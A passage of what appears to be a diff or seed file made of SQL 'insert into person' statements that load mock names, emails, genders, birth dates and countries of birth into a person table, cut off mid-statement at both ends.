'Male', '2/9/2019', 'Malaysia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Poul', 'Sanbroke', 'psanbrokeil@cdc.gov', 'Male', '6/22/2019', 'Panama'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Isidore', 'Szymaniak', 'iszymaniakim@mysql.com', 'Male', '5/10/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lin', 'Autin', 'lautinin@myspace.com', 'Male', '2/26/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Darn', 'Eouzan', null, 'Male', '5/10/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sherwynd', 'Iveagh', 'siveaghip@businesswire.com', 'Male', '2/19/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Templeton', 'Krimmer', 'tkrimmeriq@51.la', 'Male', '11/2/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kip', 'Grestye', null, 'Female', '12/14/2018', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ellary', 'Asprey', 'easpreyis@miitbeian.gov.cn', 'Male', '6/29/2019', 'Egypt'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Caz', 'Kirby', null, 'Male', '3/17/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Merrel', 'Edgeson', 'medgesoniu@nymag.com', 'Male', '5/17/2019', 'Jordan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Harman', 'Lambersen', 'hlamberseniv@phoca.cz', 'Male', '12/15/2018', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cordell', 'Balden', 'cbaldeniw@umn.edu', 'Male', '8/12/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Corrinne', 'Smeeton', null, 'Female', '4/24/2019', 'Dominican Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hale', 'Gunter', 'hgunteriy@mysql.com', 'Male', '6/10/2019', 'South Africa'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Robby', 'Blandford', null, 'Male', '1/20/2019', 'Ireland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alvy', 'Tucknutt', 'atucknuttj0@myspace.com', 'Male', '4/1/2019', 'Guatemala'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pammy', 'Coster', 'pcosterj1@walmart.com', 'Female', '12/28/2018', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Blanche', 'Davidow', 'bdavidowj2@webs.com', 'Female', '7/30/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carley', 'Harrow', 'charrowj3@dyndns.org', 'Female', '3/31/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hunter', 'Pele', 'hpelej4@earthlink.net', 'Male', '6/21/2019', 'Honduras'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Horatia', 'Tander', 'htanderj5@google.nl', 'Female', '11/16/2019', 'Zambia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nichole', 'Blaisdell', null, 'Female', '9/6/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Taber', 'Trahair', null, 'Male', '4/11/2019', 'Mongolia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bernard', 'Egglestone', 'begglestonej8@ovh.net', 'Male', '8/30/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gilda', 'Wybourne', 'gwybournej9@facebook.com', 'Female', '1/4/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bianka', 'Wafer', 'bwaferja@eepurl.com', 'Female', '12/27/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Haroun', 'Prescot', null, 'Male', '11/4/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marty', 'Antat', 'mantatjc@vimeo.com', 'Male', '9/11/2019', 'Panama'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Errick', 'Ivens', 'eivensjd@unc.edu', 'Male', '7/27/2019', 'Belarus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lisetta', 'Maddigan', 'lmaddiganje@baidu.com', 'Female', '4/26/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rozella', 'Haggerwood', 'rhaggerwoodjf@ed.gov', 'Female', '1/25/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berke', 'Guerre', 'bguerrejg@cyberchimps.com', 'Male', '10/1/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bev', 'Freebury', 'bfreeburyjh@deviantart.com', 'Male', '11/28/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Zorah', 'Airdrie', 'zairdrieji@wired.com', 'Female', '6/8/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bobby', 'Sibyllina', 'bsibyllinajj@cyberchimps.com', 'Female', '9/3/2019', 'Zimbabwe'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tarah', 'Philps', 'tphilpsjk@eepurl.com', 'Female', '7/18/2019', 'Angola'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Chick', 'Minard', 'cminardjl@sbwire.com', 'Male', '11/16/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Everett', 'Huegett', 'ehuegettjm@jigsy.com', 'Male', '12/25/2018', 'Botswana'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ernest', 'Linnell', 'elinnelljn@prnewswire.com', 'Male', '7/28/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Horst', 'Bogays', null, 'Male', '2/4/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bonnie', 'Chipperfield', null, 'Female', '2/28/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rodi', 'Byre', 'rbyrejq@redcross.org', 'Female', '1/15/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Robbert', 'Perot', 'rperotjr@youtube.com', 'Male', '12/2/2018', 'Netherlands'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Penny', 'Colthurst', 'pcolthurstjs@guardian.co.uk', 'Female', '11/23/2019', 'Albania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rabi', 'Sidebotham', 'rsidebothamjt@boston.com', 'Male', '12/2/2018', 'Syria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Giacopo', 'Barfitt', 'gbarfittju@xing.com', 'Male', '5/31/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lorena', 'Dreng', 'ldrengjv@wikimedia.org', 'Female', '4/5/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Milka', 'Commins', 'mcomminsjw@miibeian.gov.cn', 'Female', '8/27/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cally', 'Fould', 'cfouldjx@ovh.net', 'Female', '10/26/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cris', 'Lamanby', null, 'Female', '2/19/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brunhilda', 'Everley', null, 'Female', '6/24/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Eric', 'Soigne', 'esoignek0@reference.com', 'Male', '10/18/2019', 'Azerbaijan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Adel', 'Gunby', 'agunbyk1@google.com', 'Female', '4/12/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kelila', 'Meriguet', null, 'Female', '1/9/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Virginie', 'Peachey', null, 'Female', '9/29/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rebbecca', 'Caswall', 'rcaswallk4@ocn.ne.jp', 'Female', '9/10/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Filippa', 'MacCaghan', 'fmaccaghank5@live.com', 'Female', '8/22/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Annalise', 'Slinn', null, 'Female', '8/5/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Joice', 'Gostage', 'jgostagek7@huffingtonpost.com', 'Female', '2/1/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sergent', 'Bourrel', 'sbourrelk8@qq.com', 'Male', '9/15/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gladi', 'Dunniom', 'gdunniomk9@amazon.de', 'Female', '8/11/2019', 'Democratic Republic of the Congo'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Janis', 'Doggett', 'jdoggettka@java.com', 'Female', '4/20/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Aigneis', 'Staggs', 'astaggskb@washingtonpost.com', 'Female', '2/25/2019', 'Zimbabwe'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Iona', 'Boddymead', 'iboddymeadkc@dagondesign.com', 'Female', '6/27/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Garrek', 'Ravenscroft', null, 'Male', '1/11/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jewel', 'Boobier', null, 'Female', '9/26/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Stearne', 'Tompkin', 'stompkinkf@biglobe.ne.jp', 'Male', '12/29/2018', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ferdinand', 'Haack', null, 'Male', '12/15/2018', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fidole', 'Coverly', null, 'Male', '11/17/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Deena', 'Maingot', null, 'Female', '12/6/2018', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Horten', 'Leggate', null, 'Male', '1/27/2019', 'Iraq'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nikaniki', 'Syson', 'nsysonkk@europa.eu', 'Female', '8/2/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Derry', 'Elvidge', 'delvidgekl@skyrock.com', 'Male', '10/15/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tammie', 'Arondel', null, 'Female', '9/2/2019', 'Finland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dawna', 'Corneille', 'dcorneillekn@livejournal.com', 'Female', '10/1/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hillier', 'Littrik', null, 'Male', '12/5/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Blayne', 'Pepys', 'bpepyskp@mail.ru', 'Male', '5/25/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Velvet', 'Iacobacci', 'viacobaccikq@adobe.com', 'Female', '10/9/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sammy', 'Cosgrive', null, 'Male', '5/11/2019', 'Albania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sutherland', 'Higginbottam', 'shigginbottamks@springer.com', 'Male', '5/13/2019', 'Albania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Arlette', 'Galletly', null, 'Female', '11/22/2019', 'Chile'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kirby', 'Marieton', null, 'Male', '7/15/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Towney', 'Drogan', 'tdrogankv@1und1.de', 'Male', '5/14/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Filia', 'Dowty', 'fdowtykw@tripadvisor.com', 'Female', '5/29/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Erwin', 'Queenborough', 'equeenboroughkx@ustream.tv', 'Male', '2/6/2019', 'Syria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cortney', 'Czajkowska', 'cczajkowskaky@gizmodo.com', 'Female', '2/10/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hugo', 'Van Der Weedenburg', null, 'Male', '1/28/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Doralyn', 'Lurcock', 'dlurcockl0@rediff.com', 'Female', '10/9/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ginger', 'Salling', null, 'Male', '8/10/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jami', 'Halburton', 'jhalburtonl2@sfgate.com', 'Female', '7/28/2019', 'Ecuador'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Antoine', 'Skittle', null, 'Male', '1/22/2019', 'Myanmar'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ryan', 'Lording', null, 'Male', '11/28/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hermy', 'Drohan', null, 'Male', '8/9/2019', 'Uruguay'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Murial', 'Carlesi', 'mcarlesil6@about.me', 'Female', '8/14/2019', 'Nigeria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Der', 'Dowtry', 'ddowtryl7@chronoengine.com', 'Male', '9/2/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fax', 'Darinton', null, 'Male', '2/1/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carolyne', 'Martell', null, 'Female', '12/14/2018', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marmaduke', 'Summerskill', null, 'Male', '5/12/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bruno', 'Cicchillo', 'bcicchillolb@exblog.jp', 'Male', '2/5/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Caleb', 'Thayre', null, 'Male', '12/30/2018', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Estrellita', 'Salzburg', 'esalzburgld@umich.edu', 'Female', '9/21/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dukey', 'Farre', 'dfarrele@blog.com', 'Male', '12/30/2018', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gwenora', 'Bottomer', null, 'Female', '11/16/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Niels', 'Andrei', 'nandreilg@cpanel.net', 'Male', '8/25/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lynnett', 'Rumbelow', 'lrumbelowlh@geocities.com', 'Female', '9/25/2019', 'South Korea'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Viv', 'Garritley', 'vgarritleyli@go.com', 'Female', '10/16/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Benson', 'Pescott', null, 'Male', '8/9/2019', 'Venezuela'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Byrann', 'Gilfoyle', 'bgilfoylelk@barnesandnoble.com', 'Male', '10/30/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Burton', 'Woolatt', 'bwoolattll@elpais.com', 'Male', '2/13/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kevon', 'Beller', null, 'Male', '11/21/2019', 'Namibia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brandyn', 'Pallister', null, 'Male', '3/7/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bev', 'Allsebrook', 'ballsebrooklo@privacy.gov.au', 'Female', '4/20/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Chaddy', 'Jerram', 'cjerramlp@rediff.com', 'Male', '12/21/2018', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alix', 'Lannon', 'alannonlq@yellowpages.com', 'Male', '8/29/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brena', 'Duligal', 'bduligallr@wikispaces.com', 'Female', '2/18/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Christabel', 'Tame', 'ctamels@istockphoto.com', 'Female', '3/8/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Howard', 'Oakwood', 'hoakwoodlt@europa.eu', 'Male', '5/14/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Webster', 'Scones', null, 'Male', '1/27/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kristal', 'Peppin', 'kpeppinlv@japanpost.jp', 'Female', '4/14/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marketa', 'Wiggins', null, 'Female', '4/5/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Genny', 'Gilburt', null, 'Female', '3/12/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Robbin', 'Jellis', 'rjellisly@comsenz.com', 'Female', '10/1/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Guthrie', 'Scoon', 'gscoonlz@newyorker.com', 'Male', '7/9/2019', 'Cocos Islands'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gamaliel', 'Joust', 'gjoustm0@oakley.com', 'Male', '11/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marianna', 'Restieaux', null, 'Female', '7/29/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berrie', 'Langlois', 'blangloism2@thetimes.co.uk', 'Female', '1/19/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rosalinda', 'Jedraszczyk', 'rjedraszczykm3@time.com', 'Female', '12/24/2018', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vernor', 'Vallentine', 'vvallentinem4@pcworld.com', 'Male', '3/24/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sonia', 'Ethersey', 'setherseym5@sakura.ne.jp', 'Female', '12/29/2018', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Micheil', 'Allwell', null, 'Male', '8/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Al', 'Baltzar', null, 'Male', '11/14/2019', 'Pakistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hardy', 'Ruperto', 'hrupertom8@jalbum.net', 'Male', '11/1/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Elfrieda', 'Teal', null, 'Female', '10/9/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Way', 'Di Francesco', null, 'Male', '7/8/2019', 'Kosovo'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Neall', 'Gollin', 'ngollinmb@hostgator.com', 'Male', '2/3/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Devora', 'Cucuzza', null, 'Female', '7/6/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Noelani', 'Tampling', null, 'Female', '2/12/2019', 'Kenya'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lew', 'L''argent', null, 'Male', '1/24/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ulrika', 'Hamsher', null, 'Female', '1/30/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Benedick', 'Tonkes', null, 'Male', '3/13/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Karlens', 'Myrie', 'kmyriemh@reuters.com', 'Male', '5/11/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Si', 'Swire', null, 'Male', '1/8/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carmella', 'Kingshott', 'ckingshottmj@rakuten.co.jp', 'Female', '9/5/2019', 'Ireland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Virgie', 'Pettican', null, 'Male', '4/19/2019', 'Dominican Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Remus', 'Enderle', 'renderleml@about.com', 'Male', '8/19/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Stillman', 'Simonett', null, 'Male', '12/3/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Darbie', 'Ryan', 'dryanmn@apple.com', 'Female', '11/25/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Elnora', 'Waterstone', 'ewaterstonemo@constantcontact.com', 'Female', '12/17/2018', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Elisha', 'Roubert', 'eroubertmp@imageshack.us', 'Male', '9/18/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rockie', 'Pankethman', 'rpankethmanmq@cargocollective.com', 'Male', '4/9/2019', 'Bulgaria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Theodoric', 'Hastewell', 'thastewellmr@utexas.edu', 'Male', '3/30/2019', 'Australia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Giffy', 'Halward', null, 'Male', '2/16/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Javier', 'Reedyhough', null, 'Male', '4/20/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lina', 'Tritten', 'ltrittenmu@seattletimes.com', 'Female', '6/16/2019', 'Lithuania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Peta', 'Beamiss', 'pbeamissmv@jimdo.com', 'Female', '4/1/2019', 'Nigeria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dode', 'Timothy', 'dtimothymw@senate.gov', 'Female', '8/29/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kit', 'Studd', null, 'Male', '11/5/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jae', 'Probat', null, 'Male', '2/18/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lois', 'Mill', 'lmillmz@nih.gov', 'Female', '6/29/2019', 'Morocco'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jacki', 'Tearny', 'jtearnyn0@issuu.com', 'Female', '2/5/2019', 'Afghanistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sonny', 'Chiplin', 'schiplinn1@homestead.com', 'Male', '10/30/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marlee', 'Elcocks', 'melcocksn2@ucoz.com', 'Female', '5/1/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Raimondo', 'Mushett', 'rmushettn3@gizmodo.com', 'Male', '2/17/2019', 'Kiribati'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mozes', 'Darcy', 'mdarcyn4@nsw.gov.au', 'Male', '4/2/2019', 'Cyprus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marianne', 'Kellegher', 'mkelleghern5@tmall.com', 'Female', '5/8/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bordy', 'Vinten', 'bvintenn6@yahoo.co.jp', 'Male', '6/19/2019', 'Cyprus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Arney', 'Prendergrass', 'aprendergrassn7@pbs.org', 'Male', '7/31/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hillary', 'Cockland', 'hcocklandn8@live.com', 'Male', '2/27/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ceciley', 'Phillipson', 'cphillipsonn9@boston.com', 'Female', '3/17/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jedediah', 'Martini', 'jmartinina@microsoft.com', 'Male', '5/8/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Zuzana', 'Warbey', 'zwarbeynb@technorati.com', 'Female', '3/12/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lucio', 'Woodard', 'lwoodardnc@foxnews.com', 'Male', '5/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Honor', 'Bathoe', 'hbathoend@tuttocitta.it', 'Female', '7/25/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Garold', 'Summerly', 'gsummerlyne@stumbleupon.com', 'Male', '1/25/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hildagard', 'Sagrott', 'hsagrottnf@ft.com', 'Female', '10/9/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Waylen', 'Iohananof', 'wiohananofng@usgs.gov', 'Male', '1/8/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Horst', 'Wigginton', 'hwiggintonnh@ca.gov', 'Male', '4/1/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berti', 'Maffioni', 'bmaffionini@squidoo.com', 'Male', '6/29/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Danni', 'Glasman', 'dglasmannj@reddit.com', 'Female', '6/26/2019', 'Albania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dionis', 'Meeke', 'dmeekenk@nba.com', 'Female', '2/18/2019', 'Syria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dosi', 'Burbury', null, 'Female', '6/23/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Walker', 'Groome', 'wgroomenm@engadget.com', 'Male', '1/29/2019', 'Kyrgyzstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pall', 'Flukes', 'pflukesnn@tinyurl.com', 'Male', '2/20/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vanessa', 'Blackly', 'vblacklyno@newyorker.com', 'Female', '3/22/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marina', 'Mcimmie', 'mmcimmienp@ow.ly', 'Female', '9/17/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Delmer', 'Rimmer', 'drimmernq@vkontakte.ru', 'Male', '3/31/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, 